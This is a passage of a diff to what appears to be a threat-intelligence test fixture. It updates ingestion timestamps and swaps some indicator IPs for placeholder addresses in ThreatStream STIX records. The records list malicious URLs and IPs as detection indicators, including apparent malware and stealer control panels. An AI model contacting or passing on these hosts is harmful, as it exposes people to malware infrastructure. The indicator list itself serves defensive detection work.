CyberCrime\",\"id\":\"indicator--408ebd2d-063f-4646-b2e7-c00519869736\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-22T02:59:51.313Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.313Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -709,7 +709,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.185.119.172", + "name": "mal_ip: 192.168.119.172", "description": "TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-01-22T02:59:51.372Z", "valid_from": "2020-01-22T02:59:51.372Z", @@ -731,12 +731,12 @@ "first_seen": "2020-01-22T02:59:51.372Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.185.119.172" + "ip": "192.168.119.172" } }, "event": { - "ingested": "2021-12-13T05:57:34.385104380Z", - "original": "{\"created\":\"2020-01-22T02:59:51.372Z\",\"description\":\"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-22T02:59:51.372Z\",\"name\":\"mal_ip: 192.185.119.172\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.185.119.172']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.372Z\"}", + "ingested": "2021-12-13T08:38:40.022660300Z", + "original": "{\"created\":\"2020-01-22T02:59:51.372Z\",\"description\":\"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-38\"],\"modified\":\"2020-01-22T02:59:51.372Z\",\"name\":\"mal_ip: 192.168.119.172\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.119.172']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.372Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385109309Z", + "ingested": "2021-12-13T08:38:40.022666400Z", "original": "{\"created\":\"2020-01-22T02:59:51.442Z\",\"description\":\"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:51.442Z\",\"name\":\"mal_url: http://f0389246.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0389246.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.442Z\"}", "category": "threat", "type": "indicator", @@ -838,7 +838,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385114439Z", + "ingested": "2021-12-13T08:38:40.022671300Z", "original": "{\"created\":\"2020-01-22T03:00:01.563Z\",\"description\":\"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--213519c9-f511-4188-89c8-159f35f08008\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T03:00:01.563Z\",\"name\":\"mal_url: http://appareluea.com/server/cp.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/server/cp.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:01.563Z\"}", "category": "threat", "type": "indicator", 
@@ -890,7 +890,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385118817Z", + "ingested": "2021-12-13T08:38:40.022675600Z", "original": "{\"created\":\"2020-01-22T03:00:03.138Z\",\"description\":\"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:00:03.138Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot2/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.138Z\"}", "category": "threat", "type": "indicator", @@ -942,7 +942,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385123376Z", + "ingested": "2021-12-13T08:38:40.022681200Z", "original": "{\"created\":\"2020-01-22T03:00:03.396Z\",\"description\":\"TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f3e33aab-e2af-4c15-8cb9-f008a37cf986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:03.396Z\",\"name\":\"mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.396Z\"}", "category": "threat", "type": "indicator", 
@@ -994,7 +994,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385127594Z", + "ingested": "2021-12-13T08:38:40.022686400Z", "original": "{\"created\":\"2020-01-22T03:00:03.642Z\",\"description\":\"TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f03f098d-2fa9-49e1-a7dd-02518aa105fa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:00:03.642Z\",\"name\":\"mal_url: http://mecharnise.ir/ca4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:03.642Z\"}", "category": "threat", "type": "indicator", @@ -1046,7 +1046,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385131771Z", + "ingested": "2021-12-13T08:38:40.022690600Z", "original": "{\"created\":\"2020-01-22T03:00:27.534Z\",\"description\":\"TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e72e3ba0-7de5-46bb-ab1e-efdf3e0a0b3b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:00:27.534Z\",\"name\":\"mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.534Z\"}", "category": "threat", "type": "indicator", 
@@ -1098,7 +1098,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385135849Z", + "ingested": "2021-12-13T08:38:40.022695200Z", "original": "{\"created\":\"2020-01-22T03:00:27.591Z\",\"description\":\"TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--d6b59b66-5020-4368-85a7-196026856ea9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-22T03:00:27.591Z\",\"name\":\"mal_url: http://kironofer.com/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kironofer.com/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:27.591Z\"}", "category": "threat", "type": "indicator", @@ -1150,7 +1150,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385140057Z", + "ingested": "2021-12-13T08:38:40.022699300Z", "original": "{\"created\":\"2020-01-22T03:00:45.787Z\",\"description\":\"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:00:45.787Z\",\"name\":\"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.787Z\"}", "category": "threat", "type": "indicator", 
@@ -1202,7 +1202,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385144155Z", + "ingested": "2021-12-13T08:38:40.022706200Z", "original": "{\"created\":\"2020-01-22T03:00:45.841Z\",\"description\":\"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime\",\"id\":\"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-22T03:00:45.841Z\",\"name\":\"mal_url: http://smartlinktelecom.top/kings/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.841Z\"}", "category": "threat", "type": "indicator", @@ -1254,7 +1254,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385148383Z", + "ingested": "2021-12-13T08:38:40.022711900Z", "original": "{\"created\":\"2020-01-22T03:00:45.959Z\",\"description\":\"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--17777e7f-3e91-4446-a43d-79139de8a948\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-22T03:00:45.959Z\",\"name\":\"mal_url: http://carirero.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://carirero.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.959Z\"}", "category": "threat", "type": "indicator", 
@@ -1273,7 +1273,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 74.116.84.20", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime", "modified": "2020-01-22T03:00:46.025Z", "valid_from": "2020-01-22T03:00:46.025Z", @@ -1295,12 +1295,12 @@ "first_seen": "2020-01-22T03:00:46.025Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "74.116.84.20" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385153071Z", - "original": "{\"created\":\"2020-01-22T03:00:46.025Z\",\"description\":\"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-01-22T03:00:46.025Z\",\"name\":\"mal_ip: 74.116.84.20\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '74.116.84.20']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:46.025Z\"}", + "ingested": "2021-12-13T08:38:40.022719600Z", + "original": "{\"created\":\"2020-01-22T03:00:46.025Z\",\"description\":\"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-01-22T03:00:46.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:46.025Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1350,7 +1350,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385157780Z", + "ingested": "2021-12-13T08:38:40.022727Z", "original": "{\"created\":\"2020-01-22T03:00:57.729Z\",\"description\":\"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b4fd8489-9589-4f70-996c-84989245a21b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-01-22T03:00:57.729Z\",\"name\":\"mal_url: http://tuu.nu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tuu.nu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:57.729Z\"}", "category": "threat", "type": "indicator", @@ -1402,7 +1402,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385162710Z", + "ingested": "2021-12-13T08:38:40.022734400Z", "original": "{\"created\":\"2020-01-22T03:01:02.696Z\",\"description\":\"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime\",\"id\":\"indicator--bc50c62f-a015-4460-87df-2137626877e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-01-22T03:01:02.696Z\",\"name\":\"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.696Z\"}", "category": "threat", "type": "indicator", 
@@ -1454,7 +1454,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385167338Z", + "ingested": "2021-12-13T08:38:40.022741900Z", "original": "{\"created\":\"2020-01-22T03:01:02.807Z\",\"description\":\"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-22T03:01:02.807Z\",\"name\":\"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.807Z\"}", "category": "threat", "type": "indicator", @@ -1506,7 +1506,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385172057Z", + "ingested": "2021-12-13T08:38:40.022749200Z", "original": "{\"created\":\"2020-01-22T03:01:24.81Z\",\"description\":\"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:01:24.81Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:24.81Z\"}", "category": "threat", "type": "indicator", 
@@ -1525,7 +1525,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 194.87.147.80", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", "modified": "2020-01-22T03:01:41.158Z", "valid_from": "2020-01-22T03:01:41.158Z", @@ -1547,12 +1547,12 @@ "first_seen": "2020-01-22T03:01:41.158Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "194.87.147.80" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385186564Z", - "original": "{\"created\":\"2020-01-22T03:01:41.158Z\",\"description\":\"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:01:41.158Z\",\"name\":\"mal_ip: 194.87.147.80\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '194.87.147.80']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:41.158Z\"}", + "ingested": "2021-12-13T08:38:40.022756600Z", + "original": "{\"created\":\"2020-01-22T03:01:41.158Z\",\"description\":\"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:01:41.158Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:41.158Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1603,7 +1603,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385207393Z", + "ingested": "2021-12-13T08:38:40.022764Z", "original": "{\"created\":\"2020-01-22T03:01:57.189Z\",\"description\":\"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime\",\"id\":\"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T03:01:57.189Z\",\"name\":\"mal_url: http://35.158.92.3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://35.158.92.3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.189Z\"}", "category": "threat", "type": "indicator", @@ -1622,7 +1622,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.95.168.70", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-22T03:01:57.279Z", "valid_from": "2020-01-22T03:01:57.279Z", 
@@ -1644,12 +1644,12 @@ "first_seen": "2020-01-22T03:01:57.279Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.95.168.70" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385215689Z", - "original": "{\"created\":\"2020-01-22T03:01:57.279Z\",\"description\":\"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-42\"],\"modified\":\"2020-01-22T03:01:57.279Z\",\"name\":\"mal_ip: 45.95.168.70\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.95.168.70']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.279Z\"}", + "ingested": "2021-12-13T08:38:40.022771300Z", + "original": "{\"created\":\"2020-01-22T03:01:57.279Z\",\"description\":\"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-42\"],\"modified\":\"2020-01-22T03:01:57.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.279Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1700,7 +1700,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385220989Z", + "ingested": "2021-12-13T08:38:40.022775800Z", "original": "{\"created\":\"2020-01-22T03:02:50.57Z\",\"description\":\"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--23215acb-4989-4434-ac6d-8f9367734f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:02:50.57Z\",\"name\":\"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:50.57Z\"}", "category": "threat", "type": "indicator", @@ -1751,7 +1751,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385226279Z", + "ingested": "2021-12-13T08:38:40.022780400Z", "original": "{\"created\":\"2020-01-22T03:02:52.496Z\",\"description\":\"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-26\"],\"modified\":\"2020-01-22T03:02:52.496Z\",\"name\":\"mal_url: http://f0391600.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391600.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:52.496Z\"}", "category": "threat", "type": "indicator", 
@@ -1803,7 +1803,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385230847Z", + "ingested": "2021-12-13T08:38:40.022784800Z", "original": "{\"created\":\"2020-01-22T03:03:42.819Z\",\"description\":\"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--10958d74-ec60-41af-a1ab-1613257e670f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-22T03:03:42.819Z\",\"name\":\"mal_url: http://extraclick.space/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://extraclick.space/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:42.819Z\"}", "category": "threat", "type": "indicator", @@ -1855,7 +1855,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385235326Z", + "ingested": "2021-12-13T08:38:40.022790300Z", "original": "{\"created\":\"2020-01-22T03:03:52.044Z\",\"description\":\"TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--19556daa-6293-400d-8706-d0baa6b16b7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:03:52.044Z\",\"name\":\"mal_url: http://petrogarmani.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrogarmani.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:52.044Z\"}", "category": "threat", "type": "indicator", 
@@ -1907,7 +1907,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385239654Z", + "ingested": "2021-12-13T08:38:40.022794500Z", "original": "{\"created\":\"2020-01-22T03:04:01.65Z\",\"description\":\"TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b09d9be9-6703-4a7d-a066-2baebb6418fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:04:01.65Z\",\"name\":\"mal_url: http://worldatdoor.in/mighty/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:01.65Z\"}", "category": "threat", "type": "indicator", @@ -1958,7 +1958,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385244473Z", + "ingested": "2021-12-13T08:38:40.022798700Z", "original": "{\"created\":\"2020-01-22T03:04:32.717Z\",\"description\":\"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime\",\"id\":\"indicator--43febf7d-4185-4a12-a868-e7be690b14aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-22T03:04:32.717Z\",\"name\":\"mal_url: http://zanlma.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zanlma.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:32.717Z\"}", "category": "threat", "type": "indicator", 
@@ -2009,7 +2009,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385248811Z", + "ingested": "2021-12-13T08:38:40.022802600Z", "original": "{\"created\":\"2020-01-22T03:04:56.858Z\",\"description\":\"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-22T03:04:56.858Z\",\"name\":\"mal_url: http://f0369688.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0369688.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:56.858Z\"}", "category": "threat", "type": "indicator", @@ -2061,7 +2061,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385253099Z", + "ingested": "2021-12-13T08:38:40.022806800Z", "original": "{\"created\":\"2020-01-22T03:04:59.245Z\",\"description\":\"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:04:59.245Z\",\"name\":\"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 